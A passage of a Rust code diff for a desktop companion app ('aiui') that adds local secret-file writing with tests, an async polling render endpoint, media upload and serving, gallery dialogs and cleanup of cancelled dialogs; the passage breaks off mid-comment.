+    if placeholder.is_empty() {
+        return Err("substitute mode requires a non-empty 'placeholder'".into());
+    }
+    match haystack.matches(placeholder).count() {
+        1 => Ok(haystack.replacen(placeholder, value, 1)),
+        0 => Err(format!("placeholder '{placeholder}' not found in target file")),
+        n => Err(format!("placeholder '{placeholder}' found {n}× (must be exactly 1)")),
+    }
+}
+
+/// Write `value` to the field's `target` as a local file operation. Never logs
+/// `value`. Returns the [`WriteOutcome`] (the only thing that may reach the
+/// agent for a secret).
+pub fn write_local(value: &str, target: &Target) -> WriteOutcome {
+    if !is_sane_target_path(&target.path) {
+        return WriteOutcome::fail(target.path.clone(), "invalid target path".into());
+    }
+    let path = expand_tilde(&target.path);
+    let display = path.display().to_string();
+    let perm = target.perm.as_deref().and_then(parse_perm).or(Some(0o600));
+    match target.mode {
+        WriteMode::Create => {
+            if path.exists() && !target.overwrite {
+                return WriteOutcome::fail(
+                    display,
+                    "file exists and overwrite is false (mode: create)".into(),
+                );
+            }
+            match atomic_write(&path, value.as_bytes(), perm) {
+                Ok(()) => WriteOutcome::ok(display, value.len()),
+                Err(e) => WriteOutcome::fail(display, e),
+            }
+        }
+        WriteMode::Substitute => {
+            let placeholder = match target.placeholder.as_deref() {
+                Some(p) => p,
+                None => {
+                    return WriteOutcome::fail(
+                        display,
+                        "substitute mode requires 'placeholder'".into(),
+                    )
+                }
+            };
+            let existing = match std::fs::read_to_string(&path) {
+                Ok(s) => s,
+                Err(e) => return WriteOutcome::fail(display, format!("read target: {e}")),
+            };
+            match substitute_once(&existing, placeholder, value) {
+                Ok(updated) => {
+                    let bytes = updated.len();
+                    match atomic_write(&path, updated.as_bytes(), perm) {
+                        Ok(()) => WriteOutcome::ok(display, bytes),
+                        Err(e) => WriteOutcome::fail(display, e),
+                    }
+                }
+                Err(e) => WriteOutcome::fail(display, e),
+            }
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn parse_perm_octal() {
+        assert_eq!(parse_perm("0600"), Some(0o600));
+        assert_eq!(parse_perm("600"), Some(0o600));
+        assert_eq!(parse_perm("not-octal"), None);
+    }
+
+    #[test]
+    fn sane_target_path_basic() {
+        assert!(is_sane_target_path("~/.config/aiui/token"));
+        assert!(is_sane_target_path("/Users/me/.github_tokens/byte5ai"));
+        assert!(!is_sane_target_path(""));
+        assert!(!is_sane_target_path("a\nb"));
+        assert!(!is_sane_target_path("a\0b"));
+    }
+
+    #[test]
+    fn substitute_once_requires_exactly_one() {
+        assert_eq!(substitute_once("a TOKEN b", "TOKEN", "X").unwrap(), "a X b");
+        assert!(substitute_once("no marker", "TOKEN", "X").is_err());
+        assert!(substitute_once("TOKEN TOKEN", "TOKEN", "X").is_err());
+        assert!(substitute_once("x", "", "X").is_err());
+    }
+
+    #[test]
+    fn create_writes_and_refuses_clobber() {
+        let dir = std::env::temp_dir().join(format!("aiui-fw-{}", uuid::Uuid::new_v4()));
+        let path = dir.join("sub").join("key");
+        let target = Target {
+            mode: WriteMode::Create,
+            path: path.to_string_lossy().into_owned(),
+            perm: Some("0600".into()),
+            overwrite: false,
+            placeholder: None,
+        };
+        let out = write_local("s3cr3t", &target);
+        assert!(out.written, "first create: {:?}", out.error);
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), "s3cr3t");
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            let mode = std::fs::metadata(&path).unwrap().permissions().mode() & 0o777;
+            assert_eq!(mode, 0o600, "perm applied");
+        }
+        let out2 = write_local("other", &target);
+        assert!(!out2.written && out2.error.is_some(), "refuses clobber");
+        let target_ow = Target { overwrite: true, ..target };
+        let out3 = write_local("new", &target_ow);
+        assert!(out3.written);
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), "new");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+
+    #[test]
+    fn substitute_replaces_placeholder() {
+        let dir = std::env::temp_dir().join(format!("aiui-fw-{}", uuid::Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+        let path = dir.join("config.yaml");
+        std::fs::write(&path, "token: __PAT__\nother: 1\n").unwrap();
+        let target = Target {
+            mode: WriteMode::Substitute,
+            path: path.to_string_lossy().into_owned(),
+            perm: None,
+            overwrite: false,
+            placeholder: Some("__PAT__".into()),
+        };
+        let out = write_local("ghp_xxx", &target);
+        assert!(out.written, "{:?}", out.error);
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), "token: ghp_xxx\nother: 1\n");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+}
diff --git a/companion/src-tauri/src/http.rs b/companion/src-tauri/src/http.rs
index a5b0ccc..4b10bb5 100644
--- a/companion/src-tauri/src/http.rs
+++ b/companion/src-tauri/src/http.rs
@@ -1,9 +1,10 @@
 use crate::ack::AckRegistry;
 use crate::config::AppConfig;
-use crate::dialog::{DialogRequest, DialogState, DIALOG_TTL};
+use crate::dialog::{DialogState, DIALOG_TTL};
 use crate::lifetime::LifetimeStats;
 use axum::{
-    extract::State,
+    body::Bytes,
+    extract::{DefaultBodyLimit, Path, Query, State},
     http::{HeaderMap, StatusCode},
     response::IntoResponse,
     routing::{get, post},
@@ -17,28 +18,38 @@ use crate::logging::trace;
 use tauri::{AppHandle, Emitter, Manager};
 use tauri_plugin_updater::UpdaterExt;
 
-/// How long the `/render` handler waits for the frontend to acknowledge
-/// receipt of `dialog:show` before concluding the WebView event loop is
-/// dead and triggering a reload.
-const DIALOG_ACK_TIMEOUT: Duration = Duration::from_millis(500);
-
-/// Pause after `webview.reload()` before re-emitting `dialog:show`. Gives
-/// the freshly-loaded Svelte app time to mount and register its listener.
-const RELOAD_SETTLE: Duration = Duration::from_millis(300);
-
 /// How long `/health` waits for a `ui:ping` round-trip from the frontend
 /// before concluding the WebView is unresponsive.
 const UI_PING_TIMEOUT: Duration = Duration::from_millis(100);
 
-/// Idle-restart trigger: if the GUI has been alive longer than this AND
-/// hasn't served a render recently (see `IDLE_RESTART_QUIET`), the next
-/// render reloads the WebView before showing — flushes any drift that
-/// accumulated while nobody was watching.
-const IDLE_RESTART_UPTIME: Duration = Duration::from_secs(24 * 60 * 60);
-
-/// Minimum time between renders for the long-uptime reload to trigger.
-/// Prevents reloading mid-burst when many renders fire close together.
-const IDLE_RESTART_QUIET: Duration = Duration::from_secs(10 * 60);
+/// Header a bridge sets to opt into async `/render` (Step 3). Present →
+/// `POST /render` registers + surfaces the dialog, returns `{id, ttl}`
+/// immediately (202), and the caller polls `GET /render/{id}`. Absent → the
+/// legacy synchronous long-poll (POST holds the connection until the user
+/// answers). Backward-compatible: old bridges that don't set it keep working
+/// unchanged, so the wire contract stays v1.
+const ASYNC_RENDER_HEADER: &str = "x-aiui-async";
+
+/// How long a single `GET /render/{id}` long-poll parks before returning
+/// `{pending:true}` so the caller can re-poll (and emit a progress
+/// notification). Short enough to stay well under any client read timeout, so
+/// a tunnel/GUI blip can only ever cost one poll window, never a multi-minute
+/// held connection (the remote ReadError class this closes).
+const ASYNC_POLL_WINDOW: Duration = Duration::from_secs(25);
+
+/// Buffered terminal result for an async render, keyed by dialog id. The
+/// `POST /render` async branch spawns a task that awaits the user's answer and
+/// fills this; `GET /render/{id}` drains it. Decouples the dialog's lifetime
+/// from any single HTTP connection.
+struct AsyncSlot {
+    /// `Some` once the dialog reached a terminal outcome; drained by the first
+    /// successful GET. A `GET /render/{id}` poll-loops (cheap 200 ms ticks,
+    /// bounded by `ASYNC_POLL_WINDOW`) reading this — no cross-task notifier to
+    /// reason about, and a missed tick costs at most 200 ms, never correctness.
+    result: Option<crate::dialog::DialogResult>,
+    /// For the opportunistic sweep of resolved-but-never-collected slots.
+    created_at: Instant,
+}
 
 #[derive(Clone)]
 struct AppState {
@@ -47,13 +58,9 @@ struct AppState {
     ui_acks: Arc<AckRegistry>,
     lifetime: Arc<LifetimeStats>,
     app: AppHandle,
-    /// Process-start timestamp for the GUI. Used to evaluate the
-    /// idle-restart condition without requiring an OS sleep/wake hook.
-    started_at: Instant,
-    /// Last time `/render` produced (or attempted to produce) a dialog.
-    /// Mutex<Instant> is fine here — contention is bounded by the rate of
-    /// /render calls.
-    last_render_at: Arc<Mutex<Instant>>,
+    /// Buffered terminal results for async renders (Step 3), keyed by dialog
+    /// id. Empty in the all-synchronous case.
+    async_slots: Arc<Mutex<std::collections::HashMap<String, AsyncSlot>>>,
 }
 
 #[derive(Deserialize)]
@@ -61,6 +68,15 @@ struct RenderRequest {
     #[serde(default)]
     _timeout_s: Option<u64>,
     spec: serde_json::Value,
+    /// Human-legible session label set by the caller (Step 4, I8). Shown in
+    /// the dialog window's chrome so the user can tell which session a dialog
+    /// belongs to. Optional.
+    #[serde(default)]
+    session: Option<String>,
+    /// Origin host, auto-injected by the remote Python bridge (its hostname).
+    /// Optional; absent for local callers.
+    #[serde(default)]
+    session_origin: Option<String>,
 }
 
 #[derive(Serialize)]
@@ -87,6 +103,9 @@ struct HealthResponse {
     webview: WebviewHealth,
     dialogs: DialogHealth,
     children: ChildrenHealth,
+    /// Current host lifetime phase (Starting/Serving/GracePending/Exiting) —
+    /// issue #137 lifecycle state machine, surfaced for diagnostics.
+    lifecycle_phase: String,
 }
 
 #[derive(Serialize)]
@@ -111,9 +130,23 @@ struct ChildrenHealth {
     attached: usize,
 }
 
+/// Wire-contract version (Step 2, cooperative version floor). Bumped ONLY when
+/// the HTTP request/response shapes between the bridges and the companion
+/// change incompatibly — independent of the app's release version, which moves
+/// on every fix. Both bridges read it from `/version` (and `/probe`) and, on a
+/// hard mismatch, return a structured "restart this session" tool error instead
+/// of being externally killed. Ordinary app-version skew is tolerated as long
+/// as `wire_version` matches.
+///
+/// v1: the original `{spec}` → `{id,cancelled,result,reason}` contract.
+pub const WIRE_VERSION: u32 = 1;
+
 #[derive(Serialize)]
 struct VersionResponse {
     version: String,
+    /// See [`WIRE_VERSION`]. Surfaced so bridges can enforce a cooperative
+    /// compatibility floor without anyone killing anyone.
+    wire_version: u32,
     build_info: String,
     binary_path: String,
     updater_endpoint: String,
@@ -136,30 +169,59 @@ pub async fn serve(
     app: AppHandle,
 ) -> std::io::Result<()> {
     let port = cfg.http_port;
-    let now = Instant::now();
     let state = AppState {
         cfg,
         dialog,
         ui_acks,
         lifetime,
         app,
-        started_at: now,
-        last_render_at: Arc::new(Mutex::new(now)),
+        async_slots: Arc::new(Mutex::new(std::collections::HashMap::new())),
     };
 
+    // Media cache (video feature): resolve the dir up front (before `app`
+    // moves into the router state), serve it range-capably, and sweep any
+    // clips left over from a previous run so a crash can't leak disk.
+    let media_path = crate::media::media_dir(&state.app).unwrap_or_else(|e| {
+        trace(&format!("serve: media_dir unavailable: {e}"));
+        std::env::temp_dir().join("aiui-media")
+    });
+    let _ = std::fs::create_dir_all(&media_path);
+    crate::media::sweep(
+        &media_path,
+        crate::media::MEDIA_TTL,
+        crate::media::MEDIA_TOTAL_CAP,
+    );
+
     let router = Router::new()
         .route("/health", get(health))
         .route("/render", post(render))
+        .route("/render/:id", get(render_poll))
         .route("/version", get(version))
         .route("/update", post(update))
         .route("/ping", get(ping))
         .route("/probe", get(probe))
+        // Bridge pushes media bytes here; capped well above the per-file
+        // ceiling guard inside the handler so the 413 is ours, not axum's
+        // generic one.
+        .route(
+            "/media",
+            post(media_upload)
+                .layer(DefaultBodyLimit::max(crate::media::MEDIA_FILE_CAP as usize)),
+        )
+        // Capability-URL playback: unauthenticated (filename is a UUID),
+        // range-capable for video seeking via tower-http's ServeDir.
+        .nest_service(
+            "/media/blob",
+            tower_http::services::ServeDir::new(&media_path),
+        )
         .with_state(state);
 
     let addr = SocketAddr::from(([127, 0, 0, 1], port));
     let listener = bind_with_reuse(addr)?;
     trace(&format!("serve: listening on {addr}"));
     log::info!("[aiui] http listening on {addr}");
+    crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::Serving { port });
+    crate::lifecycle_log::transition(crate::lifecycle_log::Phase::Serving);
     axum::serve(listener, router)
         .await
         .map_err(std::io::Error::other)?;
@@ -222,6 +284,7 @@ async fn probe(
     Json(serde_json::json!({
         "aiui": true,
         "version": env!("CARGO_PKG_VERSION"),
+        "wire_version": WIRE_VERSION,
         "pid": std::process::id(),
         "build_sha": env!("AIUI_GIT_SHA"),
     }))
@@ -237,6 +300,76 @@ fn auth_ok(headers: &HeaderMap, token: &str) -> bool {
         .unwrap_or(false)
 }
 
+/// `POST /media` — the bridge pushes media bytes (video for the gallery/form
+/// widgets) here; we cache them on the Mac and hand back a loopback playback
+/// URL. Authenticated like every mutating endpoint. The body limit is set on
+/// the route layer; this handler adds the documented `MEDIA_FILE_CAP` guard
+/// so an oversize push gets *our* 413 with a clear message. The `?ext=`
+/// query names the cached file (and thus the served Content-Type); it is
+/// sanitised hard in `media::store`.
+///
+/// Returns `{ url, ttl_secs }`. `url` is `http://127.0.0.1:<port>/media/blob/
+/// <uuid>.<ext>` — valid both on the remote (where the bridge runs, via the
+/// reverse tunnel) and on the Mac (where the WebView plays it), since the
+/// tunnel maps `remote:7777 → mac:7777`.
+async fn media_upload(
+    State(state): State<AppState>,
+    headers: HeaderMap,
+    Query(params): Query<std::collections::HashMap<String, String>>,
+    body: Bytes,
+) -> impl IntoResponse {
+    if !auth_ok(&headers, &state.cfg.token) {
+        return (StatusCode::UNAUTHORIZED, "unauthorized").into_response();
+    }
+    if body.len() as u64 > crate::media::MEDIA_FILE_CAP {
+        return (
+            StatusCode::PAYLOAD_TOO_LARGE,
+            format!(
+                "media too large: {} bytes (max {})",
+                body.len(),
+                crate::media::MEDIA_FILE_CAP
+            ),
+        )
+            .into_response();
+    }
+    let ext = params.get("ext").map(String::as_str).unwrap_or("bin");
+    let dir = match crate::media::media_dir(&state.app) {
+        Ok(d) => d,
+        Err(e) => {
+            trace(&format!("media_upload: no cache dir: {e}"));
+            return (StatusCode::INTERNAL_SERVER_ERROR, "media cache unavailable")
+                .into_response();
+        }
+    };
+    let name = match crate::media::store(&dir, &body, ext) {
+        Ok(n) => n,
+        Err(e) => {
+            trace(&format!("media_upload: write failed: {e}"));
+            return (StatusCode::INTERNAL_SERVER_ERROR, "media write failed").into_response();
+        }
+    };
+    // Bound the cache on the way in — cheap dir scan, never blocks the render.
+    crate::media::sweep(
+        &dir,
+        crate::media::MEDIA_TTL,
+        crate::media::MEDIA_TOTAL_CAP,
+    );
+    let url = format!(
+        "http://127.0.0.1:{}/media/blob/{}",
+        state.cfg.http_port, name
+    );
+    trace(&format!(
+        "media_upload: stored {} ({} bytes)",
+        name,
+        body.len()
+    ));
+    Json(serde_json::json!({
+        "url": url,
+        "ttl_secs": crate::media::MEDIA_TTL.as_secs(),
+    }))
+    .into_response()
+}
+
 /// Composite health check. Probes the WebView event loop with a `ui:ping`
 /// round-trip, reads live counters from the dialog registry and lifetime
 /// tracker, and reports `ready` only when all three are healthy. Computed
@@ -280,6 +413,7 @@ async fn health(
         webview,
         dialogs,
         children,
+        lifecycle_phase: format!("{:?}", crate::lifecycle_log::current_phase()),
     };
 
     let status = if ready {
@@ -345,6 +479,7 @@ async fn version(
     }
     Ok(Json(VersionResponse {
         version: env!("CARGO_PKG_VERSION").to_string(),
+        wire_version: WIRE_VERSION,
         build_info: crate::logging::BUILD_INFO.to_string(),
         binary_path: crate::setup::app_binary_path(),
         updater_endpoint:
@@ -444,6 +579,14 @@ async fn update(
     let http_port = state.cfg.http_port;
     tokio::spawn(async move {
         tokio::time::sleep(Duration::from_millis(500)).await;
+        // Case (c): latch the single exit authority so the `ExitRequested`
+        // default-deny gate honours the restart-initiated exit instead of
+        // vetoing it (Invariant I1). `app.restart()` fires ExitRequested.
+        if let Some(auth) =
+            app_handle.try_state::<std::sync::Arc<crate::lifetime::ExitAuthority>>()
+        {
+            auth.authorize();
+        }
         crate::housekeeping::pre_exit_cleanup(http_port, "updater-restart");
         trace("update: restarting into new binary");
         app_handle.restart();
@@ -479,12 +622,45 @@ const KNOWN_FIELD_KINDS: &[&str] = &[
 /// specs.
 fn validate_spec(spec: &serde_json::Value) -> Result<(), (String, String)> {
     let kind = spec.get("kind").and_then(|v| v.as_str()).unwrap_or("");
-    if !matches!(kind, "ask" | "form" | "confirm") {
+    if !matches!(kind, "ask" | "form" | "confirm" | "gallery") {
         return Err((
-            format!("top-level 'kind' must be one of ask|form|confirm, got '{kind}'"),
-            "Use confirm for yes/no, ask for one-of-N, form for ≥2 inputs.".into(),
+            format!("top-level 'kind' must be one of ask|form|confirm|gallery, got '{kind}'"),
+            "Use confirm for yes/no, ask for one-of-N, form for ≥2 inputs, gallery for batch image/video review.".into(),
         ));
     }
+    if kind == "gallery" {
+        match spec.get("items").and_then(|v| v.as_array()) {
+            None => {
+                return Err((
+                    "gallery spec is missing the 'items' array".into(),
+                    "Provide items: [{value, src, label?, detail?}, …].".into(),
+                ));
+            }
+            Some(arr) if arr.is_empty() => {
+                return Err((
+                    "gallery 'items' is empty".into(),
+                    "A gallery needs at least one item to review.".into(),
+                ));
+            }
+            Some(arr) => {
+                for (i, it) in arr.iter().enumerate() {
+                    let has_value = it
+                        .get("value")
+                        .and_then(|v| v.as_str())
+                        .map(|s| !s.is_empty())
+                        .unwrap_or(false);
+                    if !has_value {
+                        return Err((
+                            format!("gallery item #{i} is missing a non-empty 'value'"),
+                            "Each item needs a stable 'value' string — it keys the returned decision."
+                                .into(),
+                        ));
+                    }
+                }
+            }
+        }
+        return Ok(());
+    }
     let mut fields: Vec<&serde_json::Value> = Vec::new();
     if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
         for t in tabs {
@@ -509,6 +685,209 @@ fn validate_spec(spec: &serde_json::Value) -> Result<(), (String, String)> {
     Ok(())
 }
 
+/// RAII cleanup for a registered render — closes the cancellation-safety hole
+/// behind the 409-storm + stranded-empty-window pair (2026-05-30 report).
+///
+/// `/render` registers a dialog, surfaces a window, then parks on
+/// `timeout(DIALOG_TTL=2h, result_rx)`. The MCP client gives up far sooner —
+/// the local Rust bridge's reqwest client times out at 300 s — and on any
+/// client-side give-up (timeout, ReadError, tunnel blip, slow dialog) Axum
+/// **drops this handler future**. None of the explicit teardown below then
+/// runs, so the registry entry sits pending for the full 2 h TTL — every
+/// subsequent `/render` gets a 409 — and the already-surfaced window is left
+/// stranded empty.
+///
+/// This guard is armed right after `try_register` and runs on *any* drop,
+/// including the future-cancelled case the explicit paths can't reach: it
+/// cancels the registry entry (freeing the slot immediately) and destroys the
+/// dialog window. It is disarmed once the handler completes its own terminal
+/// teardown, so the normal paths keep their precise behaviour and we don't
+/// double-hop the main thread. `dialog.cancel` is a no-op once the entry is
+/// gone and `destroy_dialog_window` is idempotent, so an over-fire is harmless.
+///
+/// Note: this is a targeted robustness fix, not the spec's Step 3 (async
+/// `/render`), which removes the multi-minute held connection entirely. It
+/// makes the *current* synchronous handler cancellation-safe in the meantime.
+struct RenderGuard {
+    id: String,
+    dialog: Arc<DialogState>,
+    /// `None` only in unit tests, where no Tauri app exists to host a window.
+    app: Option<AppHandle>,
+    armed: bool,
+}
+
+impl RenderGuard {
+    fn disarm(&mut self) {
+        self.armed = false;
+    }
+}
+
+impl Drop for RenderGuard {
+    fn drop(&mut self) {
+        if !self.armed {
+            return;
+        }
+        trace(&format!(
+            "render: handler future dropped before terminal teardown — \
+             cleaning up id={} (cancel registry entry + destroy window)",
+            self.id
+        ));
+        // Free the registry slot so the next /render isn't 409'd for 2 h.
+        self.dialog.cancel(&self.id);
+        // Tear down the surfaced window (labelled by id) so it can't strand.
+        if let Some(app) = &self.app {
+            let app_for_destroy = app.clone();
+            let id_for_destroy = self.id.clone();
+            let _ = app.run_on_main_thread(move || {
+                crate::destroy_dialog_window(&app_for_destroy, &id_for_destroy)
+            });
+        }
+    }
+}
+
+/// Await a registered dialog's terminal outcome (bounded by `DIALOG_TTL`),
+/// then tear its window down. Shared by the synchronous POST path (awaited
+/// inline) and the async path (run in a detached task that fills the
+/// `AsyncSlot`). Factoring it out keeps the two paths byte-for-byte identical
+/// in resolution + teardown semantics.
+async fn resolve_dialog(
+    state: AppState,
+    id: String,
+    result_rx: tokio::sync::oneshot::Receiver<crate::dialog::DialogResult>,
+) -> crate::dialog::DialogResult {
+    trace(&format!("render: awaiting user response id={}", id));
+    let result = match tokio::time::timeout(DIALOG_TTL, result_rx).await {
+        Ok(Ok(r)) => r,
+        Ok(Err(_)) => crate::dialog::DialogResult {
+            id: id.clone(),
+            cancelled: true,
+            result: serde_json::Value::Null,
+            reason: Some("channel_dropped".into()),
+        },
+        Err(_) => {
+            // TTL expired without user response. Cancel the registry entry
+            // (frees its slot) and produce the same 200-OK cancelled shape a
+            // user-driven cancel produces — only `reason` differs (#36, the
+            // v0.4.45 Bug #5 fix: never surface this as a transport error).
+            trace(&format!("render: TTL expired id={}", id));
+            state.dialog.cancel(&id);
+            crate::dialog::DialogResult {
+                id: id.clone(),
+                cancelled: true,
+                result: serde_json::Value::Null,
+                reason: Some("ttl_expired".into()),
+            }
+        }
+    };
+    trace(&format!(
+        "render: got response id={} cancelled={}",
+        result.id, result.cancelled
+    ));
+    // Authoritative window teardown (v0.4.46, Bug B): single point that
+    // guarantees a dialog window never outlives its dialog. Idempotent —
+    // a no-op on the submit/cancel paths where the window is already gone.
+    let app_for_destroy = state.app.clone();
+    let id_for_destroy = id.clone();
+    let _ = state
+        .app
+        .run_on_main_thread(move || crate::destroy_dialog_window(&app_for_destroy, &id_for_destroy));
+    result
+}
+
+/// Drop async-render result slots older than `DIALOG_TTL` — covers the case
+/// where a caller posts an async render, the dialog resolves, but the caller
+/// never collects the result via GET (process died after POST). Called
+/// opportunistically on each new async render; no background reaper.
+fn sweep_async_slots(state: &AppState) {
+    let now = Instant::now();
+    state
+        .async_slots
+        .lock()
+        .unwrap()
+        .retain(|_, s| now.duration_since(s.created_at) <= DIALOG_TTL);
+}
+
+/// Outcome of looking up an async-render slot by id.
+enum SlotLook {
+    /// Resolved — the terminal result (already removed from the map).
+    Ready(crate::dialog::DialogResult),
+    /// Registered but not yet resolved.
+    Pending,
+    /// No such id — never an async render, or already collected.
+    Gone,
+}
+
+/// Drain an async-render slot: if resolved, take its result and remove the slot
+/// (`Ready`); if still in flight, `Pending`; if absent, `Gone`. Pure over the
+/// map so the `/render/{id}` branching is unit-testable without a Tauri app.
+fn drain_async_slot(
+    slots: &mut std::collections::HashMap<String, AsyncSlot>,
+    id: &str,
+) -> SlotLook {
+    let taken = match slots.get_mut(id) {
+        Some(slot) => slot.result.take(),
+        None => return SlotLook::Gone,
+    };
+    match taken {
+        Some(result) => {
+            slots.remove(id);
+            SlotLook::Ready(result)
+        }
+        None => SlotLook::Pending,
+    }
+}
+
+/// GET `/render/{id}` — bounded long-poll for an async render's result (Step
+/// 3). Returns the terminal `{id, cancelled, result, reason}` once available
+/// (and drains the slot), `{pending: true}` after one `ASYNC_POLL_WINDOW` so
+/// the caller re-polls, or 404 for an unknown id (never an async render, or
+/// already collected). The caller loops GET until terminal or it gives up.
+async fn render_poll(
+    State(state): State<AppState>,
+    headers: HeaderMap,
+    Path(id): Path<String>,
+) -> impl IntoResponse {
+    if !auth_ok(&headers, &state.cfg.token) {
+        return (
+            StatusCode::UNAUTHORIZED,
+            Json(serde_json::json!({"error": "unauthorized"})),
+        )
+            .into_response();
+    }
+
+    let deadline = Instant::now() + ASYNC_POLL_WINDOW;
+    loop {
+        let look = drain_async_slot(&mut state.async_slots.lock().unwrap(), &id);
+        match look {
+            SlotLook::Ready(result) => {
+                trace(&format!("render_poll: delivered id={}", id));
+                return Json(RenderResponse {
+                    id: result.id,
+                    cancelled: result.cancelled,
+                    result: result.result,
+                    reason: result.reason,
+                })
+                .into_response();
+            }
+            SlotLook::Gone => {
+                trace(&format!("render_poll: unknown id={}", id));
+                return (
+                    StatusCode::NOT_FOUND,
+                    Json(serde_json::json!({"error": "unknown_render_id", "id": id})),
+                )
+                    .into_response();
+            }
+            SlotLook::Pending => {
+                if Instant::now() >= deadline {
+                    return Json(serde_json::json!({"pending": true, "id": id}))
+                        .into_response();
+                }
+                tokio::time::sleep(Duration::from_millis(200)).await;
+            }
+        }
+    }
+}
+
 async fn render(
     State(state): State<AppState>,
     headers: HeaderMap,
@@ -554,245 +933,108 @@ async fn render(
             .into_response();
     }
 
-    // v0.4.36: try_register rejects when a dialog is already in flight
-    // instead of evicting the existing one. Two parallel callers — multi-
-    // call-per-turn, two Claude sessions, or a stale window from a prior
-    // timeout — would otherwise overlay each other in the single dialog
-    // window, with the older request's `oneshot` resolving as `evicted`
-    // exactly while the user was still looking at it. The 409 response
-    // gives the second caller a structured "busy" answer so the agent
-    // can choose to retry or tell the user the dialog is held by
-    // something else. Setup-window-driven UI calls don't go through
-    // /render at all, so this only governs agent dialog traffic.
-    let (id, result_rx, ack_rx) = match state.dialog.try_register() {
-        Ok(triple) => triple,
-        Err(busy) => {
-            trace(&format!(
-                "render: rejected — companion busy (pending={}, oldest_age={}s)",
-                busy.pending_count, busy.oldest_age_secs
-            ));
-            return (
-                StatusCode::CONFLICT,
-                Json(serde_json::json!({
-                    "error": "busy",
-                    "pending_count": busy.pending_count,
-                    "oldest_age_secs": busy.oldest_age_secs,
-                })),
-            )
-                .into_response();
+    // Multi-window (Step 4, I8): N dialogs may be in flight at once — the
+    // single-occupancy 409 is gone. `register_dialog` stores the request (the
+    // per-id window pulls it via `get_dialog_spec`) and only evicts the oldest
+    // if the hard cap is hit. Setup-window UI calls don't go through /render,
+    // so this governs agent dialog traffic only. Size is estimated from the
+    // spec before it moves into the registry.
+    let size = crate::dialog::resolve_start_size(&req.spec);
+    // Native title-bar text (I8): "aiui — <session> · <origin>", computed
+    // before session/origin move into the registry. Set on the window by Rust
+    // (frontend setTitle is permission-gated). Falls back to "aiui".
+    let window_title = {
+        let mut parts: Vec<&str> = Vec::new();
+        if let Some(s) = req.session.as_deref().filter(|s| !s.is_empty()) {
+            parts.push(s);
+        }
+        if let Some(o) = req.session_origin.as_deref().filter(|o| !o.is_empty()) {
+            parts.push(o);
+        }
+        if parts.is_empty() {
+            "aiui".to_string()
+        } else {
+            format!("aiui — {}", parts.join(" · "))
         }
     };
+    let (id, result_rx) = state.dialog.register_dialog(
+        req.spec,
+        req.session,
+        req.session_origin,
+        DIALOG_TTL.as_secs(),
+    );
     trace(&format!("render: registered id={}", id));
-    let dr = DialogRequest {
+    // Cancellation-safety net: until the terminal teardown (sync) or the
+    // hand-off to the detached task (async), a dropped handler future must not
+    // leak the registry entry or strand the window. See `RenderGuard`.
+    let mut guard = RenderGuard {
         id: id.clone(),
-        spec: req.spec,
-        // Sent so the frontend can schedule warning banners + auto-cancel
-        // a fraction before the backend sweep fires. Single source of
-        // truth lives in `DIALOG_TTL`. v0.4.41.
-        ttl_secs: DIALOG_TTL.as_secs(),
+        dialog: state.dialog.clone(),
+        app: Some(state.app.clone()),
+        armed: true,
     };
 
-    // ── Idle-restart check (#41) ────────────────────────────────────────
-    // If the GUI has been up for a long time and the last render was a
-    // while ago, reload the WebView before serving this one. Catches
-    // accumulated drift (sleep/wake artefacts, stuck event listeners)
-    // *exactly* when it would matter — not on a wall-clock timer.
-    //
-    // Important: never reload while a previous dialog is still pending.
-    // The reload tears down the WebView's JS state including any active
-    // dialog the user might be looking at, and the still-awaiting
-    // `/render` handler would get a `channel_dropped` cancellation
-    // instead of the user's actual answer. Only reload when the registry
-    // is empty. Issue #H-6 in v0.4.10 review.
-    {
-        let last = *state.last_render_at.lock().unwrap();
-        let pending = state.dialog.stats().orphan_count;
-        if state.started_at.elapsed() > IDLE_RESTART_UPTIME
-            && last.elapsed() > IDLE_RESTART_QUIET
-            && pending == 0
-        {
-            trace(&format!(
-                "render: idle-restart trigger (uptime {:?}, last_render {:?} ago, registry empty)",
-                state.started_at.elapsed(),
-                last.elapsed()
-            ));
-            reload_main_webview(&state.app);
-            tokio::time::sleep(RELOAD_SETTLE).await;
-        } else if state.started_at.elapsed() > IDLE_RESTART_UPTIME
-            && last.elapsed() > IDLE_RESTART_QUIET
-        {
-            trace(&format!(
-                "render: idle-restart suppressed — {} pending dialog(s) in registry",
-                pending
-            ));
-        }
-    }
-
-    // Mark this render attempt — done early so the ack/recreate path
-    // still resets the idle clock even if the user closes the dialog.
-    *state.last_render_at.lock().unwrap() = Instant::now();
-
-    // Surface the window from the main thread. If the window is being
-    // built fresh (first render of this session, or after the user
-    // closed it), `ensure_dialog_window` reset the ready flag.
-    // Window-size estimate is per-spec — wide widgets widen, long
-    // forms grow vertically. v0.4.40.
-    let size = crate::dialog::estimate_dialog_size(&dr.spec);
-    surface_main_window(&state.app, &id, size);
-
-    // Window-ready handshake: wait until the frontend signals that
-    // its `dialog:show` listener is registered. Without this gate
-    // we'd race against Vite-bundle-load + Svelte-mount + tauri-listen,
-    // and on the first render of a session the emit would land before
-    // the listener — silent loss, 500 ms ack timeout, webview reload
-    // and a confused user staring at a blank window.
-    wait_for_dialog_ready(&state.app, "pre-emit").await;
-
-    // Emit the dialog to the frontend.
-    if let Err(e) = state
-        .app
-        .emit_to(crate::DIALOG_WINDOW_LABEL, "dialog:show", &dr)
+    // Build a fresh window labelled by the dialog id (Step 4 pull model). The
+    // window reads its own label and fetches the spec via `get_dialog_spec` on
+    // mount — there is no `dialog:show` emit, no ready-handshake, no ack
+    // timeout, and no reload-retry, because the frontend initiates and so
+    // can't race an event it isn't listening for yet. Window ops are
+    // main-thread-only.
     {
-        trace(&format!("render: emit FAILED: {e}"));
-    } else {
-        trace(&format!("render: emitted dialog:show id={}", id));
-    }
-
-    // ── Ack-Contract ────────────────────────────────────────────────────
-    // Wait briefly for the frontend to confirm receipt. If no ack arrives,
-    // the WebView event loop is most likely dead — try to revive it by
